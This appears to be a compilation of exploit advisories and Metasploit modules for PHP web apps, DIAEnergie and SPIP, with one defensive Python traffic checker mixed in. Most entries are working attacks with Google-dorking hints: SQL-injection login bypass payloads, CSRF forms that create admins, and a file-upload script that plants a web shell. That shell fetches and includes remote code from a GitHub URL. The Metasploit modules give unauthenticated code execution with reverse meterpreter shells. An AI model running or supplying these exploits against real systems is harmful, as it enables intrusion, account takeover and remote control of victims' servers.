<pre><code>=============================================================================================================================================<br />| # Title : Company Visitor Management 1.0 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://phpgurukul.com/wp-content/uploads/2019/04/Company-Visitor-Management-System-PHP.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] use payload : user & pass = ' or 0=0 ##<br /><br />[+] http://127.0.0.1/cvms/index.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : CMSsite 1.0 PHP code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://github.com/VictorAlagwu/CMSsite/archive/master.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] This payload injects PHP code of your choice into a SHELL.php file. <br /><br />[+] Line 31<br /> Line 40<br /> <br />[+] change the path of the script folder.<br /><br />[+] save payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1<br /><br />[+] payload : <br /><br /><?php<br /><br />function file_upload($target_ip) {<br /> $file_name = "indoushka.php";<br /> $webshell_payload = "<?php<br /> \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';<br /> \$ch = curl_init();<br /> curl_setopt(\$ch, CURLOPT_URL, \$url);<br /> curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);<br /> \$output = curl_exec(\$ch);<br /> curl_close(\$ch);<br /> if (\$output) {<br /> include 'data://text/plain;base64,' . base64_encode(\$output);<br /> }<br /> ?>";<br /><br /> $post_fields = array(<br /> 'create_post' => '',<br /> 'post_image' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),<br /> 'post_title' => 'inouva',<br /> 'post_category_id' => '123',<br /> 'post_tags' => '99',<br /> 'post_content' => 'N0_name',<br /> 'post_status' => 'Hackers',<br /> 'qty' => '1'<br /> );<br /><br /> echo "(+) PHP Code Injection ...\n";<br /><br /> $ch = curl_init();<br /> curl_setopt($ch, CURLOPT_URL, "http://$target_ip/CMSsite-master/admin/posts.php?source=add_post");<br /> curl_setopt($ch, CURLOPT_POST, 1);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /><br /> $response = curl_exec($ch);<br /> curl_close($ch);<br /><br /> echo "(+) Shell uploaded successfully.\n";<br /> echo "(+) Access the shell at: http://$target_ip/CMSsite-master/img/$file_name\n";<br />}<br /><br />if ($argc != 2) {<br /> echo "(+) Usage: php " . $argv[0] . " <target ip>\n";<br /> echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";<br /> exit(-1);<br />}<br /><br />$target_ip = $argv[1];<br />file_upload($target_ip);<br /><br /><br /><br />[+] Path : http://127.0.0.1/CMSsite-master/img/<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : CMS RIMI v1.3 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://github.com/myroot593/RIMICMS |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] The following HTML code creates a new admin.<br /><br />[+] Go to line 9.<br /><br />[+] Set the target site link, save changes and apply.<br /><br />[+] save code as poc.html.<br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Profile User Form</title><br /></head><br /><body><br /> <form action="http://127.0.0.1/RIMICMS-master/admin/tambah-user.php" method="POST"><br /> <!-- Text input for username --><br /> <label for="username">Username:</label><br /> <input type="text" id="username" name="username" required><br /><br /> <!-- Password input for password --><br /> <label for="password">Password:</label><br /> <input type="password" id="password" name="password" required><br /><br /> <!-- Password input for confirm password --><br /> <label for="confirm_password">Confirm Password:</label><br /> <input type="password" id="confirm_password" name="confirm_password" required><br /><br /> <!-- Text input for name --><br /> <label for="nama">Nama:</label><br /> <input type="text" id="nama" name="nama" required><br /><br /> <!-- Text input for email --><br /> <label for="email">Email:</label><br /> <input type="email" id="email" name="email" required><br /><br /> <!-- Hidden input for user ID --><br /> <input type="hidden" name="id" value=""><br /><br /> <!-- Submit button --><br /> <button type="submit">Submit</button><br /> </form><br /></body><br /></html><br /><br /><br />------------------ [+] Part 2 arbitrary file upload [+] -------------<br /><br /><br />[+] Go to line 3.<br /><br />[+] Set the target site link, save changes and apply.<br /><br />[+] Your file : 127.0.0.1/cmsrimi/content <br /><br />[+] save code as poc.html.<br /><br /><p class="sukses-form"></p><br /><p class="error-form"></p><br /><form action="http://127.0.0.1/RIMICMS-master/admin/tambah-berita.php" method="post" enctype="multipart/form-data"><br /> <div class="form-group "><br /> <label>Judul :</label><br /> <input type="text" name="judul_berita" class="form-control" id="judul_berita1" placeholder="Masukan judul berita" value=""><br /> <span><p class="error-form"></p></span><br /> </div><br /> <div class="form-group "><br /> <label>Isi Berita :</label><br /> <textarea class="ckeditor" name="isi_berita" id="isi_berita"></textarea><br /> <span><p class="error-form"></p></span><br /> </div><br /> <div class="form-group"><br /> <label>Kategori Berita :</label><br /> <select class='form-control' name='kategori_berita' id='kategori_berita' required=''><option value=1>1</option><option value=a60CyEG6>a60CyEG6</option><option value=0+0+0+1>0+0+0+1</option><option value=basGxKs3>basGxKs3</option><option value=${9999829+9999678}>${9999829+9999678}</option><option value=1&n991278=v96422>1&n991278=v96422</option><option value=)>)</option><option value=/etc/passwd>/etc/passwd</option><option value=!(()&&!|*|*|>!(()&&!|*|*|</option><option value=^(#$!@#$)(()))******>^(#$!@#$)(()))******</option><option value=\'"()>\'"()</option><option value=testasp.vulnweb.com>testasp.vulnweb.com</option><option value=kategori-berita.php>kategori-berita.php</option><option value=file:///etc/passwd>file:///etc/passwd</option><option value=WEB-INF/web.xml?>WEB-INF/web.xml?</option><option value=WEB-INFweb.xml?>WEB-INFweb.xml?</option><option value=1\'">1\'"</option><option value=></option><option value=/WEB-INF/web.xml?>/WEB-INF/web.xml?</option><option value=/www.vulnweb.com>/www.vulnweb.com</option><option value=\'">\'"</option><option value=942313>942313</option><option value=@@5nFvp>@@5nFvp</option><option value=<!--><!--</option><option value=JyI=>JyI=</option><option value=//www.vulnweb.com>//www.vulnweb.com</option><option value=1_927257>1_927257</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1acuON4DgYSPCb>1acuON4DgYSPCb</option><option value=1_924662>1_924662</option><option value=1 src=943436>1 src=943436</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_996088>1_996088</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_984620>1_984620</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option></select> <p class="error-form"></p><br /> </div><br /> <div class="form-group"><br /> <label>Status:</label><br /> <select class="form-control" name="status_berita" id="status_berita"><br /> <option value="Diterbitkan">Diterbitkan</option><br /> <option value="Draft">Draft</option><br /> </select><br /> </div><br /> <div class="form-group"><br /> <label>Gambar Berita</label><br /> <input type="hidden" name="tanggal_berita" id="tanggal_berita" value="24-08-22"><br /> <input type="file" class="form-control-file" id="gambar_berita" name="gambar_berita"><br /> <p class="error-form"></p><br /> </div><br /> <button type="submit" class="btn btn-primary">Submit</button><br /></form><br /> <p class="error-form"></p> <br /> <p class="error-form"></p><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Client ms Project 1.0 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://phpgurukul.com/client-management-system-using-php-mysql/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] use payload : user = 'or''='@gmail.com & pass = 'or''='<br /><br />[+] http://127.0.0.1/CCMS/<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : CCMS Project 1.0 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] use payload : user = 'or''='@gmail.com & pass = 'or''='<br /><br />[+] http://127.0.0.1/CCMS/<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : biobook Social Networking Site 1.0 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/janobe/Social%20Networking%20Site%20in%20PHP%20with%20Full%20Source%20Code.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] use payload : user = 'or''='@gmail.com & pass = 'or''='<br /><br />[+] http://127.0.0.1/social/home.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /> include Msf::Exploit::Remote::Tcp<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'DIAEnergie SQL Injection (CVE-2024-4548)',<br /> 'Description' => %q{<br /> SQL injection vulnerability in DIAEnergie <= v1.10 from Delta Electronics.<br /> This vulnerability can be exploited by an unauthenticated remote attacker to gain arbitrary code execution through a SQL injection vulnerability in the CEBC service. The commands will get executed in the context of NT AUTHORITY\SYSTEM.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Michael Heinzl', # MSF exploit<br /> 'Tenable' # Discovery & PoC<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://www.tenable.com/security/research/tra-2024-13'],<br /> [ 'CVE', '2024-4548']<br /> ],<br /> 'DisclosureDate' => '2024-05-06',<br /> 'Platform' => 'win',<br /> 'Arch' => [ ARCH_CMD ],<br /> 'Targets' => [<br /> [<br /> 'Windows_Fetch',<br /> {<br /> 'Arch' => [ ARCH_CMD ],<br /> 'Platform' => 'win',<br /> 'DefaultOptions' => {<br /> 'FETCH_COMMAND' => 'CURL',<br /> 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'<br /> },<br /> 'Type' => :win_fetch<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /><br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RPORT(928)<br /> ]<br /> )<br /> end<br /><br /> # Determine if the DIAEnergie version is vulnerable<br /> def check<br /> begin<br /> connect<br /> sock.put 'Who is it?'<br /> res = sock.get || ''<br /> rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e<br /> vprint_error(e.message)<br /> return Exploit::CheckCode::Unknown<br /> ensure<br /> disconnect<br /> end<br /><br /> if res.empty?<br /> vprint_status('Received an empty response.')<br /> return Exploit::CheckCode::Unknown<br /> end<br /><br /> vprint_status('Who is it response: ' + res.to_s)<br /> version_pattern = /\b\d+\.\d+\.\d+\.\d+\b/<br /> version = res.match(version_pattern)<br /><br /> # No version string in the banner: the service answered but cannot be fingerprinted<br /> return Exploit::CheckCode::Detected if version.nil?<br /><br /> vprint_status('Version retrieved: ' + version[0])<br /><br /> unless Rex::Version.new(version[0]) <= Rex::Version.new('1.10.1.8610')<br /> return CheckCode::Safe<br /> end<br /><br /> return CheckCode::Appears<br /> end<br /><br /> def exploit<br /> execute_command(payload.encoded)<br /> end<br /><br /> def execute_command(cmd)<br /> scname = Rex::Text.rand_text_alphanumeric(5..10).to_s<br /> vprint_status('Using random script name: ' + scname)<br /><br /> year = rand(2024..2026)<br /> month = sprintf('%02d', rand(1..12))<br /> day = sprintf('%02d', rand(1..29))<br /> random_date = "#{year}-#{month}-#{day}"<br /> vprint_status('Using random date: ' + random_date)<br /><br /> hour = sprintf('%02d', rand(0..23))<br /> minute = sprintf('%02d', rand(0..59))<br /> second = sprintf('%02d', rand(0..59))<br /> random_time = "#{hour}:#{minute}:#{second}"<br /> vprint_status('Using random time: ' + random_time)<br /><br /> # Inject payload<br /> begin<br /> print_status('Sending SQL injection...')<br /> connect<br /> vprint_status("RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'#{scname}', N'CreateObject(\"WScript.shell\").run(\"cmd /c #{cmd}\")', N'', N'');--")<br /> sock.put "RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'#{scname}', N'CreateObject(\"WScript.shell\").run(\"cmd /c #{cmd}\")', N'', N'');--"<br /> res = sock.get<br /> unless res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.'<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)<br /> end<br /><br /> vprint_status('Injection - Expected response received: ' + res.to_s)<br /> disconnect<br /><br /> # Trigger<br /> print_status('Triggering script execution...')<br /> connect<br /> sock.put "RecalculateScript~#{random_date} #{random_time}~#{random_date} #{random_time}~1"<br /> res = sock.get<br /> unless res.to_s == 'Recalculate Script Start!'<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)<br /> end<br /> vprint_status('Trigger - Expected response received: ' + res.to_s)<br /><br /> disconnect<br /><br /> print_good('Script successfully injected, check thy shell.')<br /> ensure<br /> # Cleanup<br /> print_status('Cleaning up database...')<br /> connect<br /> sock.put "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);DELETE FROM DIAEnergie.dbo.DIAE_script WHERE name='#{scname}';--"<br /> res = sock.get<br /> unless res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.'<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)<br /> end<br /> vprint_status('Cleanup - Expected response received: ' + res.to_s)<br /><br /> disconnect<br /> end<br /> end<br />end<br /></code></pre>
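The CEBC exchange the module above drives is something a defender can watch on the wire. The Python checker below is an added example (not part of the Metasploit module or of Delta's software): it validates the tilde-separated `Recalculate*` frames the module shows and flags the "too many closing parentheses" reply the module waits for. Frame layout and reply text come from the module; the sample frames are constructed.

```python
"""Defender-side inspection of DIAEnergie CEBC 'Recalculate*' frames.

Added example. It assumes only what the module shows: frames look like
"command~start~end~flag", timestamps are "YYYY-MM-DD HH:MM:SS", the flag is
a small integer, and an injection attempt is answered with
"RecalculateHDMWYC Fail! The expression has too many closing parentheses."
"""
import re

# The two commands the module exchanges with the CEBC service (TCP 928 by default).
RECALC_COMMANDS = {"RecalculateHDMWYC", "RecalculateScript"}

# Timestamp format used in the legitimate frames.
TIMESTAMP_RE = re.compile(r"^\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}$")

# Metacharacters and keywords that never belong in a numeric flag field.
SQL_META_RE = re.compile(
    r"[;'\"()]|--|\b(?:insert|delete|update|drop|exec|union|select)\b",
    re.IGNORECASE,
)

# Fragment of the server error the module treats as "injection accepted".
INJECTION_REPLY_MARK = "too many closing parentheses"


def inspect_frame(frame: str) -> dict:
    """Return a verdict for one client frame.

    'modelled' is False for commands this checker does not know (the banner
    probe "Who is it?", for instance); such frames are never flagged here.
    """
    parts = frame.split("~")
    command = parts[0]
    findings = []

    if command not in RECALC_COMMANDS:
        return {"command": command, "modelled": False, "suspicious": False, "findings": []}

    if len(parts) != 4:
        findings.append(f"expected 4 fields, got {len(parts)}")
    else:
        for name, value in (("start", parts[1]), ("end", parts[2])):
            if not TIMESTAMP_RE.match(value):
                findings.append(f"{name} field is not a timestamp: {value!r}")
        flag = parts[3]
        if not flag.isdigit():
            findings.append(f"flag field is not numeric: {flag!r}")
        if SQL_META_RE.search(flag):
            findings.append("SQL metacharacters or keywords in flag field")

    return {"command": command, "modelled": True, "suspicious": bool(findings), "findings": findings}


def inspect_reply(reply: str) -> bool:
    """True when a server reply carries the parenthesis error the module expects.

    A well-formed frame never produces unbalanced parentheses, so this reply is a
    high-signal indicator that the preceding frame carried injected SQL.
    """
    return INJECTION_REPLY_MARK in reply


def scan(frames) -> list:
    """Return the indexes of the frames that should raise an alert."""
    return [i for i, frame in enumerate(frames) if inspect_frame(frame)["suspicious"]]


# Constructed sample traffic (not captured data). The third frame mimics the
# injection shape with a harmless stand-in statement; only its shape matters.
SAMPLE_FRAMES = [
    "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1",
    "RecalculateScript~2024-02-04 00:00:00~2024-02-05 00:00:00~1",
    "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);SELECT 1;--",
    "Who is it?",
]

if __name__ == "__main__":
    for frame in SAMPLE_FRAMES:
        print(inspect_frame(frame))
    print("alerts:", scan(SAMPLE_FRAMES))
```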
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Payload::Php<br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'SPIP Unauthenticated RCE via porte_plume Plugin',<br /> 'Description' => %q{<br /> This module exploits a Remote Code Execution vulnerability in SPIP versions up to and including 4.2.12.<br /> The vulnerability occurs in SPIP’s templating system where it incorrectly handles user-supplied input,<br /> allowing an attacker to inject and execute arbitrary PHP code. This can be achieved by crafting a<br /> payload manipulating the templating data processed by the `echappe_retour()` function, invoking<br /> `traitements_previsu_php_modeles_eval()`, which contains an `eval()` call.<br /> },<br /> 'Author' => [<br /> 'Valentin Lobstein', # Metasploit module author<br /> 'Laluka', # Vulnerability discovery<br /> 'Julien Voisin' # Review<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-0-alpha2-SPIP-4-2-13-SPIP-4.html'],<br /> ['URL', 'https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_1_the_feather']<br /> ],<br /> 'Platform' => ['php', 'unix', 'linux', 'win'],<br /> 'Arch' => [ARCH_PHP, ARCH_CMD],<br /> 'Targets' => [<br /> [<br /> 'PHP In-Memory', {<br /> 'Platform' => 'php',<br /> 'Arch' => ARCH_PHP<br /> # tested with php/meterpreter/reverse_tcp<br /> }<br /> ],<br /> [<br /> 'Unix/Linux Command Shell', {<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => ARCH_CMD<br /> # tested with cmd/linux/http/x64/meterpreter/reverse_tcp<br /> }<br /> ],<br /> [<br /> 'Windows Command Shell', {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD<br /> # tested with cmd/windows/http/x64/meterpreter/reverse_tcp<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Privileged' => false,<br /> 'DisclosureDate' => '2024-08-16',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> end<br /><br /> def check<br /> uri = normalize_uri(target_uri.path, 'spip.php')<br /> res = send_request_cgi({ 'uri' => uri.to_s })<br /><br /> return Exploit::CheckCode::Unknown('Target is unreachable.') unless res<br /> return Exploit::CheckCode::Unknown("Target responded with unexpected HTTP response code: #{res.code}") unless res.code == 200<br /><br /> version_string = res.get_html_document.at('head/meta[@name="generator"]/@content')&.text<br /> return Exploit::CheckCode::Unknown('Unable to find the version string on the page: spip.php') unless version_string =~ /SPIP (.*)/<br /><br /> version = ::Regexp.last_match(1)<br /><br /> if version.nil? && res.headers['Composed-By'] =~ /SPIP (.*) @/<br /> version = ::Regexp.last_match(1)<br /> end<br /><br /> return Exploit::CheckCode::Unknown('Unable to determine the version of SPIP') unless version<br /><br /> print_status("SPIP Version detected: #{version}")<br /><br /> if Rex::Version.new(version) > Rex::Version.new('4.2.12')<br /> return CheckCode::Safe("The detected SPIP version (#{version}) is not vulnerable.")<br /> end<br /><br /> return CheckCode::Appears("The detected SPIP version (#{version}) is vulnerable.")<br /> end<br /><br /> def php_exec_cmd(encoded_payload)<br /> dis = '$' + Rex::Text.rand_text_alpha(rand(4..7))<br /> encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)<br /> shell = <<-END_OF_PHP_CODE<br /> #{php_preamble(disabled_varname: dis)}<br /> $c = base64_decode("#{encoded_clean_payload}");<br /> #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}<br /> END_OF_PHP_CODE<br /> return shell<br /> end<br /><br /> def exploit<br /> print_status('Preparing to send exploit payload to the target...')<br /> phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)<br /> b64_payload = framework.encoders.create('php/base64').encode(phped_payload)<br /> payload = "[<img#{Rex::Text.rand_text_numeric(8)}>->URL`<?php #{b64_payload} ?>`]"<br /><br /> print_status('Sending exploit payload to the target...')<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'spip.php'),<br /> 'vars_get' => {<br /> 'action' => 'porte_plume_previsu'<br /> },<br /> 'data' => "data=#{payload}"<br /> })<br /> end<br /><br />end<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : AVMS Project 1.0 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://phpgurukul.com/wp-content/uploads/2019/07/Apartment-Visitors-Management-System-Project.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] use payload : user = 'or''='@gmail.com & pass = 'or''='<br /><br />[+] http://127.0.0.1/AVMS/<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online Survey System 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-survey-system_0.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] This HTML page :<br /><br /> is a user registration form that allows users to input a username, password, and upload an avatar image. <br /> The form data is then sent via an AJAX request to a server-side script for processing.<br /><br />[+] Here's a breakdown of how it works:<br /><br /> HTML Structure<br /><br /> Form Elements:<br /> <br /> username: A text field where the user can input their username.<br /> password: A password field for entering a password.<br /> img: A file input for uploading an avatar image (restricted to image file types).<br /><br /> Save User Button:<br /> <br /> An input element with the type button is used to trigger the saveUser() function when clicked.<br /><br />[+] JavaScript (AJAX Request)<br /><br /> <br /> AJAX Request:<br /> <br /> An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).<br /> The request method is POST, and the data is sent to the specified URL.<br /> The onload function checks if the request was successful (status code 200). If it was,<br /> it alerts the user that the save was successful; otherwise, it alerts the user of an error.<br /><br />[+] Backend Requirements :<br /><br /> The server-side script (Users.php) should be capable of handling the incoming POST request, <br /> processing the form data (including saving the file), and returning an appropriate response.<br /><br /> This form can be improved by adding additional client-side validations, better error handling, <br /> and perhaps enhancing security measures, such as sanitizing inputs on the server side.<br /><br />[+] save code as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>User Registration</title><br /></head><br /><body><br /><br /> <h2>User Registration</h2><br /> <form id="userForm" enctype="multipart/form-data"><br /> <label for="email">Email:</label><br /> <input type="email" id="email" name="email" required><br><br><br /><br /> <label for="password">Password:</label><br /> <input type="password" id="password" name="password" required><br><br><br /><br /> <input type="button" value="Save User" onclick="saveUser()"><br /> </form><br /><br /> <script><br /> function saveUser() {<br /> var form = document.getElementById('userForm');<br /> var formData = new FormData(form);<br /><br /> var xhr = new XMLHttpRequest();<br /> xhr.open("POST", "http://127.0.0.1/survey/ajax.php?action=save_user", true);<br /><br /> xhr.onload = function () {<br /> if (xhr.status === 200) {<br /> alert('User saved successfully');<br /> } else {<br /> alert('An error occurred while saving the user');<br /> }<br /> };<br /><br /> xhr.send(formData);<br /> }<br /> </script><br /><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>